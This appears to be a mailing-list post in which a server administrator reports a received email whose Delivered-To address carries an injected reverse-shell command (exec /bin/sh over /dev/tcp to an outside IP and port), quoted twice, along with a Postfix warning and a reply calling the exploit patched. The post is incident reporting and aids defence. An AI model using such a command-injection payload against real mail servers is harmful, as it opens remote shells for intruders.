It seems the user was trying to get a shell delivered to there TCP stream. I have heard of an exploit like this, it was plugged quite quickly though so as long as you are up to date you should be fine.
I received an interesting email today. I only noticed because I had
logged in SSH and got the "you have new email" message. Reading via
"mail", I see :
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295
1>&0 2>&0"@calliope.bitfolk
Obviously some sort of possible exploit. The IP address 87.106.250.176
is Germany (1&1 Internet).
Postfix reported :
warning: 36FE51381A3: address with illegal extension: root+:|exec
/bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0
But it was delivered. I hope nothing bad has happened. I am running
AIDE as we speak and digging around).
Cheers,
--
Alastair Sherringham
http://www.sherringham.net
_______________________________________________
users mailing list
users@lists.bitfolk.com
https://lists.bitfolk.com/mailman/listinfo/users